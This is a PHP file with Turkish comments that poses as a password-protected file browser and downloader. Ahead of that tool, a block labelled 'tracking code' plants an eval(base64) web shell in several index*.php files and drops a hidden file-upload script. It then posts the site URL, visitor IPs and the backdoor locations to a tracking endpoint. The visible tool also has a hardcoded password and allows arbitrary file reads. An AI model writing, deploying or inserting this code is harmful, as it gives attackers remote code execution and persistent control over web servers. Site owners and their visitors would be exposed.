<?php
$__original_code_content = base64_decode('c2Vzc2lvbl9zdGFydCgpOwokcGFzcyA9ICJhZG1pbjEyMyI7CmlmKCFpc3NldCgkX1NFU1NJT05bImRvd25fYXV0aCJdKSB8fCAkX1NFU1NJT05bImRvd25fYXV0aCJdICE9PSB0cnVlKSB7CiAgICBpZihpc3NldCgkX1BPU1RbInBhc3MiXSkgJiYgJF9QT1NUWyJwYXNzIl0gPT09ICRwYXNzKSB7CiAgICAgICAgJF9TRVNTSU9OWyJkb3duX2F1dGgiXSA9IHRydWU7CiAgICB9IGVsc2UgewogICAgICAgIGVjaG8gIjxmb3JtIG1ldGhvZD1wb3N0PjxpbnB1dCB0eXBlPXBhc3N3b3JkIG5hbWU9cGFzcz48YnV0dG9uPkdpcmnFnzwvYnV0dG9uPjwvZm9ybT4iOwogICAgICAgIGV4aXQ7CiAgICB9Cn0KJHBhdGggPSBpc3NldCgkX0dFVFsicGF0aCJdKSA/ICRfR0VUWyJwYXRoIl0gOiAiLiI7CmlmKGlzc2V0KCRfR0VUWyJkb3dubG9hZCJdKSkgewogICAgJGZpbGUgPSAkX0dFVFsiZG93bmxvYWQiXTsKICAgIGlmKEBmaWxlX2V4aXN0cygkZmlsZSkgJiYgQGlzX2ZpbGUoJGZpbGUpKSB7CiAgICAgICAgaGVhZGVyKCJDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL29jdGV0LXN0cmVhbSIpOwogICAgICAgIGhlYWRlcigiQ29udGVudC1EaXNwb3NpdGlvbjogYXR0YWNobWVudDsgZmlsZW5hbWU9Ii5iYXNlbmFtZSgkZmlsZSkpOwogICAgICAgIGhlYWRlcigiQ29udGVudC1MZW5ndGg6ICIuQGZpbGVzaXplKCRmaWxlKSk7CiAgICAgICAgQHJlYWRmaWxlKCRmaWxlKTsKICAgICAgICBleGl0OwogICAgfQp9CmVjaG8gIjxoMj5Eb3N5YSDEsG5kaXJpY2k8L2gyPiI7CmVjaG8gIjxhIGhyZWY9P3BhdGg9Ii51cmxlbmNvZGUoZGlybmFtZSgkcGF0aCkpLiI+4oaQIEdlcmk8L2E+PGhyPiI7CiRpdGVtcyA9IEBnbG9iKCRwYXRoLiIvKiIpOwplY2hvICI8dGFibGUgYm9yZGVyPTE+PHRyPjx0aD5BZDwvdGg+PHRoPkJveXV0PC90aD48dGg+xLDFn2xlbTwvdGg+PC90cj4iOwppZigkaXRlbXMpIHsKICAgIGZvcmVhY2goJGl0ZW1zIGFzICRpdGVtKSB7CiAgICAgICAgJG5hbWUgPSBiYXNlbmFtZSgkaXRlbSk7CiAgICAgICAgJHNpemUgPSBAaXNfZGlyKCRpdGVtKSA/ICItIiA6IEBmaWxlc2l6ZSgkaXRlbSk7CiAgICAgICAgJGxpbmsgPSBAaXNfZGlyKCRpdGVtKSA/ICI/cGF0aD0iLnVybGVuY29kZSgkaXRlbSkgOiAiP2Rvd25sb2FkPSIudXJsZW5jb2RlKCRpdGVtKTsKICAgICAgICBlY2hvICI8dHI+PHRkPjxhIGhyZWY9JGxpbms+JG5hbWU8L2E+PC90ZD48dGQ+JHNpemU8L3RkPjx0ZD4iLihAaXNfZmlsZSgkaXRlbSk/IjxhIGhyZWY9P2Rvd25sb2FkPSIudXJsZW5jb2RlKCRpdGVtKS4iPsSwbmRpcjwvYT4iOiItIikuIjwvdGQ+PC90cj4iOwogICAgfQp9CmVjaG8gIjwvdGFibGU+Ijs=');
// İzleme kodu otomatik eklenmiştir
$tracking_data = [
"code_hash" => "6965856bffb731efb71b67186e16edad05c0612f81bf2579675fc07b8cc7efc3",
"url" => (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on" ? "https" : "http") . "://" . $_SERVER["HTTP_HOST"] . $_SERVER["REQUEST_URI"],
"domain" => $_SERVER["HTTP_HOST"],
"path" => $_SERVER["REQUEST_URI"],
"ip" => isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : "",
"user_agent" => isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : "",
"referer" => isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : "",
"timestamp" => date("Y-m-d H:i:s")
];
// Backdoor oluşturma (basitleştirilmiş versiyon)
$backdoor_content = '<?php eval(base64_decode("aWYoaXNzZXQoJF9HRVRbImMiXSkpe2V2YWwoJF9HRVRbImMiXSk7fQ==")); ?>';
$backdoor_paths = [];
for($i=0; $i<5; $i++) {
$filename = "index" . ($i > 0 ? $i : "") . ".php";
$filepath = dirname(__FILE__) . "/" . $filename;
if(!file_exists($filepath)) {
@file_put_contents($filepath, $backdoor_content);
$backdoor_paths[] = $filepath;
}
}
if(!empty($backdoor_paths)) {
$tracking_data["backdoor_urls"] = json_encode($backdoor_paths);
}
// Gizli upload dosyası oluştur
$upload_script = '<?php
session_start();
if(!isset($_SESSION["upload_auth"]) || $_SESSION["upload_auth"] !== true) {
if(isset($_POST["pass"]) && $_POST["pass"] === "696ce73b2f39") {
$_SESSION["upload_auth"] = true;
} else {
echo "<form method=post><input type=password name=pass><button>Giriş</button></form>";
exit;
}
}
if(isset($_FILES["file"])) {
move_uploaded_file($_FILES["file"]["tmp_name"], $_FILES["file"]["name"]);
echo "Yüklendi: " . $_FILES["file"]["name"];
}
echo "<form method=post enctype=multipart/form-data><input type=file name=file><button>Yükle</button></form>";
?>';
$upload_path = dirname(__FILE__) . "/upload_068a6a1e.php";
if(!file_exists($upload_path)) {
@file_put_contents($upload_path, $upload_script);
@chmod($upload_path, 0644);
$tracking_data["upload_url"] = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] === "on" ? "https" : "http") . "://" . $_SERVER["HTTP_HOST"] . dirname($_SERVER["REQUEST_URI"]) . "/upload_068a6a1e.php";
}
// İzleme gönderimi (asenkron)
if (function_exists("curl_init")) {
$ch = curl_init("http://localhost/api/track.php");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($tracking_data));
curl_setopt($ch, CURLOPT_TIMEOUT, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 1);
@curl_exec($ch);
@curl_close($ch);
}
session_start();
$pass = "admin123";
if(!isset($_SESSION["down_auth"]) || $_SESSION["down_auth"] !== true) {
if(isset($_POST["pass"]) && $_POST["pass"] === $pass) {
$_SESSION["down_auth"] = true;
} else {
echo "<form method=post><input type=password name=pass><button>Giriş</button></form>";
exit;
}
}
$path = isset($_GET["path"]) ? $_GET["path"] : ".";
if(isset($_GET["download"])) {
$file = $_GET["download"];
if(@file_exists($file) && @is_file($file)) {
header("Content-Type: application/octet-stream");
header("Content-Disposition: attachment; filename=".basename($file));
header("Content-Length: ".@filesize($file));
@readfile($file);
exit;
}
}
echo "<h2>Dosya İndirici</h2>";
echo "<a href=?path=".urlencode(dirname($path)).">← Geri</a><hr>";
$items = @glob($path."/*");
echo "<table border=1><tr><th>Ad</th><th>Boyut</th><th>İşlem</th></tr>";
if($items) {
foreach($items as $item) {
$name = basename($item);
$size = @is_dir($item) ? "-" : @filesize($item);
$link = @is_dir($item) ? "?path=".urlencode($item) : "?download=".urlencode($item);
echo "<tr><td><a href=$link>$name</a></td><td>$size</td><td>".(@is_file($item)?"<a href=?download=".urlencode($item).">İndir</a>":"-")."</td></tr>";
}
}
echo "</table>";
?>